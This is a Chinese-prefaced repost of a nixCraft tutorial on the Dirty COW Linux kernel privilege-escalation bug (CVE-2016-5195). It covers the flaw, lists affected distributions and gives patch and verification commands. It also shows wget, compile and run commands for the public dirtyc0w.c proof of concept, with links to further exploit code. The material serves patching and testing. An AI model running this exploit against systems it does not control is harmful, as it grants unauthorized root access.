OS: 脏牛(Dirty COW)漏洞:Linux 内核通杀提权漏洞 (CVE-2016-5195)
2017-04-13 00:00
1356 查看
注意,编译漏洞利用程序时:
在Ubuntu 15.10下实际测试,需要改为:
gcc -pthread dirtyc0w.c -o dirtyc0w
或
才能正常编译。
其他漏洞利用代码:
https://github.com/dirtycow/dirtycow.github.io/wiki/PoCs http://www.tuicool.com/articles/Rjiy2ma
nixCraft
原文
http://www.cyberciti.biz/faq/dirtycow-linux-cve-2016-5195-kernel-local-privilege-escalation-vulnerability-fix/
主题
Linux内核
A very serious security problem has been found in the Linux kernel. A 0-day local privilege escalation vulnerability has existed for eleven years since 2005. This bug affects all sort of of Android or Linux kernel to escalate privileges. Any user can become root in less than 5 seconds. The bug has existed since Linux kernel version 2.6.22+. How do I fix this problem?
This bug is named as
Dirty COW
(CVE-2016-5195) is a privilege escalation vulnerability in the Linux Kernel. Exploitation of this bug does not leave any trace of anything abnormal happening to the logs. So you can not detect if someone has exploited this against your server.
A race condition was found in the way the Linux kernel’s memory subsystem handled the copy-on-write (COW) breakage of private read-only memory mappings. An unprivileged local user could use this flaw to gain write access to otherwise read-only memory mappings and thus increase their privileges on the system.
A nasty bug for sure. Any local users can write to any file they can read, and present since at least Linux kernel version 2.6.22.Linus Torvalds explained :
This is an ancient bug that was actually attempted to be fixed once (badly) by me eleven years ago in commit 4ceb5db9757a (“Fix get_user_pages() race for write access”) but that was then undone due to problems on s390 by commit f33ea7f404e5 (“fix get_user_pages bug”).
In the meantime, the s390 situation has long been fixed, and we can now fix it by checking the pte_dirty() bit properly (and do it better). The s390 dirty bit was implemented in abf09bed3cce (“s390/mm: implement software dirty bits”) which made it into v3.9. Earlier kernels will have to look at the page state itself.
Also, the VM has become more scalable, and what used a purely theoretical race back then has become easier to trigger.
To fix it, we introduce a new internal FOLL_COW flag to mark the “yes, we already did a COW” rather than play racy games with FOLL_WRITE that is very fundamental, and then use the pte dirty flag to validate that the FOLL_COW flag is still valid.
Red Hat Enterprise Linux 6.x
Red Hat Enterprise Linux 5.x
CentOS Linux 7.x
CentOS Linux 6.x
CentOS Linux 5.x
Debian Linux wheezy
Debian Linux jessie
Debian Linux stretch
Debian Linux sid
Ubuntu Linux precise (LTS 12.04)
Ubuntu Linux trusty
Ubuntu Linux xenial (LTS 16.04)
Ubuntu Linux yakkety
Ubuntu Linux vivid/ubuntu-core
SUSE Linux Enterprise 11 and 12.
Sample outputs:
Reboot the server:
Related: Ubuntu Linux users can hotfix this Linux kernel bug without rebooting the server .
gcc -lpthread dirtyc0w.c -o dirtyc0w
在Ubuntu 15.10下实际测试,需要改为:
gcc -pthread dirtyc0w.c -o dirtyc0w
或
gcc dirtyc0w.c -o dirtyc0w [b]-lpthread
[/b]才能正常编译。
其他漏洞利用代码:
https://github.com/dirtycow/dirtycow.github.io/wiki/PoCs http://www.tuicool.com/articles/Rjiy2ma
How To Patch and Protect Linux Kernel Zero Day Local Privilege Escalation Vulnerability CVE...
时间 2016-10-21 16:21:45nixCraft
原文
http://www.cyberciti.biz/faq/dirtycow-linux-cve-2016-5195-kernel-local-privilege-escalation-vulnerability-fix/
主题
Linux内核
A very serious security problem has been found in the Linux kernel. A 0-day local privilege escalation vulnerability has existed for eleven years since 2005. This bug affects all sort of of Android or Linux kernel to escalate privileges. Any user can become root in less than 5 seconds. The bug has existed since Linux kernel version 2.6.22+. How do I fix this problem?
This bug is named as
Dirty COW
(CVE-2016-5195) is a privilege escalation vulnerability in the Linux Kernel. Exploitation of this bug does not leave any trace of anything abnormal happening to the logs. So you can not detect if someone has exploited this against your server.
What is CVE-2016-5195 bug?
From the project :A race condition was found in the way the Linux kernel’s memory subsystem handled the copy-on-write (COW) breakage of private read-only memory mappings. An unprivileged local user could use this flaw to gain write access to otherwise read-only memory mappings and thus increase their privileges on the system.
A nasty bug for sure. Any local users can write to any file they can read, and present since at least Linux kernel version 2.6.22.Linus Torvalds explained :
This is an ancient bug that was actually attempted to be fixed once (badly) by me eleven years ago in commit 4ceb5db9757a (“Fix get_user_pages() race for write access”) but that was then undone due to problems on s390 by commit f33ea7f404e5 (“fix get_user_pages bug”).
In the meantime, the s390 situation has long been fixed, and we can now fix it by checking the pte_dirty() bit properly (and do it better). The s390 dirty bit was implemented in abf09bed3cce (“s390/mm: implement software dirty bits”) which made it into v3.9. Earlier kernels will have to look at the page state itself.
Also, the VM has become more scalable, and what used a purely theoretical race back then has become easier to trigger.
To fix it, we introduce a new internal FOLL_COW flag to mark the “yes, we already did a COW” rather than play racy games with FOLL_WRITE that is very fundamental, and then use the pte dirty flag to validate that the FOLL_COW flag is still valid.
A list of affected Linux distros (including VMs and containers that share the same kernel)
Red Hat Enterprise Linux 7.xRed Hat Enterprise Linux 6.x
Red Hat Enterprise Linux 5.x
CentOS Linux 7.x
CentOS Linux 6.x
CentOS Linux 5.x
Debian Linux wheezy
Debian Linux jessie
Debian Linux stretch
Debian Linux sid
Ubuntu Linux precise (LTS 12.04)
Ubuntu Linux trusty
Ubuntu Linux xenial (LTS 16.04)
Ubuntu Linux yakkety
Ubuntu Linux vivid/ubuntu-core
SUSE Linux Enterprise 11 and 12.
How do I fix CVE-2016-5195 on Linux?
Type the commands as per your Linux distro. You need to reboot the box . Before you apply patch, note down your current kernel version:$ uname -a $ uname -mrs
Sample outputs:
Linux 3.13.0-95-generic x86_64
Debian or Ubuntu Linux
$ sudo apt-get update && sudo apt-get upgrade && sudo apt-get dist-upgrade
Reboot the server:
$ sudo reboot
Related: Ubuntu Linux users can hotfix this Linux kernel bug without rebooting the server .
RHEL / CentOS Linux 5.x/6.x/7.x
$ sudo yum update $ sudo reboot
RHEL / CentOS Linux 4.x
$ sudo up2date -u $ sudo reboot
Suse Enterprise Linux or Opensuse Linux
To apply all needed patches to the system type:# zypper patch # reboot
Verification
You need to make sure your version number has changed:$ uname -a $ uname -r $ uname -mrs
Determine if your system is vulnerable
For RHEL/CentOS Linux, use the following script:$ wget https://access.redhat.com/sites/default/files/rh-cve-2016-5195_1.sh $ bash rh-cve-2016-5195_1.sh
For all other distro try PoC (proof of concept exploit code)
Grab the PoC:$ wget https://raw.githubusercontent.com/dirtycow/dirtycow.github.io/master/dirtyc0w.c[/code]
Run it as follows. First be root:$ sudo -s # echo this is not a test > foo
Run it as normal user:$ gcc -lpthread dirtyc0w.c -o dirtyc0w $ ./dirtyc0w foo m00000000000000000 mmap 56123000 madvise 0 procselfmem 1800000000 $ cat foo m00000000000000000References:
Ubuntu Linux: CVE-2016-5195 .
Debian Linux: CVE-2016-5195 .
RHEL/CentOS Linux: CVE-2016-5195 .
Suse enterprise Linux: CVE-2016-5195(coming soon).
dirtycow .
Share this tutorial on:
分享
相关文章推荐
- OS: 脏牛(Dirty COW)漏洞:Linux 内核通杀提权漏洞 (CVE-2016-5195)
- “脏牛(Dirty Cow)”漏洞】CVE-2016-5195:Linux 内核本地提权漏洞 通告及修复
- Linux内核通杀提权漏洞CVE-2016-5195 - 内核升级方法
- (CVE-2016-0728)Linux Keyring refcount 内核提权漏洞
- 悬镜安全实验室丨DirtyCow Linux权限提升漏洞分析(CVE-2016-5195)
- Linux内核通杀提权漏洞CVE-2016-5195验证
- linux本地内核提权漏洞 Dirty COW 成因分析
- DirtyCow Linux权限提升漏洞分析(CVE-2016-5195)
- [置顶] 安全漏洞--linux 最新内核通用提权漏洞利用示例 (脏牛Dirty COW)
- Tomcat曝本地提权漏洞 (CVE-2016-1240 附PoC)
- GNU/Linux内核新特性引发提权漏洞
- Linux 内核 UFO-非UFO 路径切换内存破坏漏洞的 PoC(CVE-2017-1000112)
- CVE-2017-2370浅析-macos内核提权漏洞
- “Dirty COW”提权漏洞!CentOS 7发布内核修复补丁
- CVE-XX-XX:“Atom截胡”Windows内核提权漏洞分析
- CVE-2014-3153浅析-android内核提权漏洞
- GNU/Linux程序崩溃分析框架漏洞导致内核提权风险
- CVE-2014-0038内核漏洞原理与本地提权利用代码实现分析 作者:seteuid0
- 如何修补和保护 Linux 内核堆栈冲突漏洞 CVE-2017-1000364